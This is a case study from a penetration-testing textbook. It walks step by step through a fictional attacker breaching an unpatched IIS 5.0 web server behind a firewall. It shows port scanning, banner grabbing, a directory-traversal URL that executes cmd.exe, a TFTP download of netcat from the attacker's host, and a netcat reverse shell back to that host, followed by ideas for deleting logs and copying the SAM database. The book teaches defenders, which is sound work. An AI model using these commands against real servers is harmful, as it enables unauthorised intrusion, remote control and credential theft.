Case Study

 < Day Day Up > 

This case study takes several of the tools and techniques discussed in the chapter and links them to a full-blown breach on an internal network. Evil Jimmy's exploits demonstrate that web servers should always be kept updated and patched.

The Little Company Network has just rebuilt its web server in a DMZ that hosts http://www.hackmynetwork.com. It has configured the Cisco PIX Firewall to statically map port 80 from the Internet to the internal web server and blocked all other external access. The network administrators have been pressured by management and customers, so they have not been able to apply service packs or security features to the Windows 2000 IIS server yet. However, they believe that because the server is behind a firewall, attacks will be stopped and give them some safety before they get a chance later to install the service packs and properly lock down the server. Three days have passed, and their optimism is unfounded when Evil Jimmy gets his hands on the server. Figure 7-39 displays the network used in this case study.

Figure 7-39. Sample Network


Well, Evil Jimmy is off to prove a point to his hacking buddies that he can hack an IIS 5.0 web server in less than five minutes. His first task is to find a nice easy target system. That is where http://www.hackmynetwork.com comes into play. He starts the clock at 23:47 PM.

Step 1.

To start, Evil Jimmy port scans the http://www.hackmynetwork.com IP address using NMap to look for open ports. He uses the sT switch to guarantee that the ports are open and limits his port scanning range to the first 100 ports with the p switch to help avoid detection and the O to perform some OS guessing. The command and output returned are as follows:

C:\>nmap -sT -O -p 1-100 -vv www.hackmynetwork.com Starting nmap 3.81 ( http://www.insecure.org/nmap ) at 2005-03-25 23:47 GMT Stan dard Time Note: Host seems down. If it is really up, but blocking our ping probes, try -P0 Nmap finished: 1 IP address (0 hosts up) scanned in 2.244 seconds                Raw packets sent: 4 (136B) | Rcvd: 0 (0B) C:\>

As Jimmy reviews the results returned from NMap, he sees that it states the host is down. Well, that is not actually true, so some kind of blocking device that does not allow ICMP must be in place. He tries again with the P0 switch to prevent pinging the target first and performs the scan whether the host is up or not. The output returned is as follows:

C:\>nmap -sT -O -p 1-100 -vv www.hackmynetwork.com -P0 Starting nmap 3.81 ( http://www.insecure.org/nmap ) at 2005-03-25 23:47 GMT Stan dard Time Initiating Connect() Scan against www.hackmynetwork.com (172.16.0.2) [100 ports]  at 23:47 Discovered open port 80/tcp on 172.16.0.2 The Connect() Scan took 22.15s to scan 100 total ports. For OSScan assuming port 80 is open, 1 is closed, and neither are firewalled Insufficient responses for TCP sequencing (0), OS detection may be less accurate For OSScan assuming port 80 is open, 1 is closed, and neither are firewalled Insufficient responses for TCP sequencing (0), OS detection may be less accurate For OSScan assuming port 80 is open, 1 is closed, and neither are firewalled Insufficient responses for TCP sequencing (0), OS detection may be less accurate Host www.hackmynetwork.com (172.16.0.2) appears to be up ... good. Interesting ports on www.hackmynetwork.com (172.16.0.2): (The 99 ports scanned but not shown below are in state: closed) PORT    STATE SERVICE 80/tcp  open  http Too many fingerprints match this host to give specific OS details TCP/IP fingerprint: SInfo(V=3.81%P=i686-pc-windows-windows%D=3/26%Tm=424523E5%O=80%C=1) T1(Resp=N) T2(Resp=N) T3(Resp=N) T4(Resp=N) T5(Resp=N) T6(Resp=N) T7(Resp=N) PU(Resp=N) Nmap finished: 1 IP address (1 host up) scanned in 73.335 seconds                Raw packets sent: 60 (3600B) | Rcvd: 0 (0B) C:\>

That is better. From the NMap output, Jimmy finds that port 80 is the only port open in the range. He also notices that it failed to detect the operating system from the fingerprinting scan.

Step 2.

Seeing that NMap had a little bit of trouble, Evil Jimmy deduces that a firewall must be in place blocking the normal calling and operating system fingerprinting scan. So instead, he attempts a banner grab technique to help determine what kind of web server is behind the firewall. Using a standard Telnet client to connect specifically to port 80, he pushes an invalid HTTP GET request to retrieve the banner of the web servers. The syntax and returned result are as follows:

C:\>nc -vv www.hackmynetwork.com 80 www.hackmynetwork.com [172.16.0.2] 80 (http) open GET test HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.0 Date: Fri, 25 Mar 2005 23:49:30 GMT Content-Type: text/html Content-Length: 87 <html><head><title>Error</title></head><body>The parameter is incorrect. </body> </html>sent 9, rcvd 224: NOTSOCK C:\>

From the first two steps, Jimmy is pretty positive that http://www.hackmynetwork.com is behind a firewall. With the banner information, he knows the web server is a Windows 2000 IIS 5.0 web server. Now he starts to get excited. With all the possible vulnerabilities associated with that version of web server, he has a plethora of tools he can try. The time is 23:49 PM.

Step 3.

Jimmy knows that IIS 5.0 web servers were vulnerable to Directory Traversal attacks. It is worth a try to see if the server has not been patched. By using a web browser, Jimmy enters a directory traversal syntax that should return a directory from the web server. The command used within the browser is as follows:

http://www.hackmynetwork.com/scripts/..%255c../winnt/system32/ cmd.exe?/c+dir+c:\

Figure 7-40 displays the output returned from the web server.

Figure 7-40. Directory Traversal Results


Jimmy almost falls out of his chair! This is going to be a great night! Looking over at the clock, he sees it is about 23:49 PM. He has three minutes left.

Now that Jimmy has proven that he can execute the cmd.exe command on the server, it is time to start uploading a backdoor for easier access and avoid using the web server application all together. Jimmy has selected NetCat as his backdoor of choice. His goal is to shovel cmd.exe from the web server to his attacking computer and provide himself a neat remote cmd.exe shell.

Step 4.

Evil Jimmy starts up his personal TFTP server and points it to a directory that contains all his great hacker tools NetCat in this particular case. Figure 7-41 shows the Cisco free TFTP server on Evil Jimmy's computer.

Figure 7-41. Cisco TFTP Server


Step 5.

Jimmy sends the command to the web server asking it to get a copy of NetCat and save it to its own hard drive. Following is the syntax used to accomplish this:

http://www.hackmynetwork.com/scripts/..%255c../winnt/system32/ cmd.exe?/c+TFTP+-i+172.16.0.13+GET+nc.exe

Figure 7-42 shows activity in the TFTP server on Jimmy's computer proving that the file was actually copied. Also notice the CGI error message on the browser. This is normal because the web server does not really know how to handle the return message, so it displays an error message. That is nothing to worry about, because the activity on the TFTP program does show that NetCat was downloaded.

Figure 7-42. TFTP Server Activity


Step 6.

Now Jimmy needs to start a listening port on his computer to capture the remote cmd.exe shell he is trying to shovel back. To do this, on his personal computer, he uses NetCat to capture data on port 1010 as follows. (The time is 23:51 PM.)

C:\>nc -vv -L -p 1010 listening on [any] 1010 ...

Step 7.

Jimmy is almost done, but he still needs to move the cmd.exe shell from the web server across the Internet to port 1010 of his personal computer. To do this, he sends another command via the web server telling cmd.exe to run NetCat and push a cmd.exe to Evil Jimmy's computer. The command used in the web browser is as follows:

http://www.hackmynetwork.com/scripts/..%255c../winnt/system32/ cmd.exe?/c+nc+-e+cmd.exe+172.16.0.13+1010

Step 8.

Back on his computer, Jimmy glances over at his listening NetCat program to see a Windows command shell header appear. Just to make sure, he executes the hostname and ipconfig /all commands to find out the name and IP address of the computer:

C:\>nc -vv -L -p 1010 listening on [any] 1010 ... Microsoft Windows 2000 [Version 5.00.2195]  Copyright 1985-1999 Microsoft Corp. c:\inetpub\scripts>hostname hostname WEB2 c:\inetpub\scripts>ipconfig /all ipconfig /all Windows 2000 IP Configuration         Host Name . . . . . . . . . . . . : WEB2         Primary DNS Suffix  . . . . . . . :         Node Type . . . . . . . . . . . . : Hybrid         IP Routing Enabled. . . . . . . . : No         WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection:         Connection-specific DNS Suffix  . :         Description . . . . . . . . . . . : SiS 900-Based PCI Fast Ethernet Adapter         Physical Address. . . . . . . . . : 00-11-2F-0F-6E-DB         DHCP Enabled. . . . . . . . . . . : No         IP Address. . . . . . . . . . . . : 192.168.200.21         Subnet Mask . . . . . . . . . . . : 255.255.255.0         Default Gateway . . . . . . . . . : 192.168.200.254         DNS Servers . . . . . . . . . . . : c:\inetpub\scripts>

Now Jimmy can execute commands at will on the web server via this command shell window. He can copy files onto or off the web server as he pleases. The time is 23:52 PM. He has made it!

Step 9.

Now that Jimmy is in the network, he has some options:

- Delete the IIS log files

- Copy the SAM database

- Copy any database that the server might contain

- Get a list of all the files and folders on the server

- Modify the website

As you can see, Evil Jimmy was able to hack into the server easily and return a command shell on the server. The moral of the story is that the Little Company Network should not trust the firewall for protection. To give the PIX credit, it actually does protect everything being thrown at the server barring port 80, but the application behind that port remains insecure, making the entire network vulnerable to attack.

     < Day Day Up > 


    Penetration Testing and Network Defense
    Penetration Testing and Network Defense
    ISBN: 1587052083
    EAN: 2147483647
    Year: 2005
    Pages: 209

    flylib.com © 2008-2017.
    If you may any questions please contact us: flylib@qtcs.net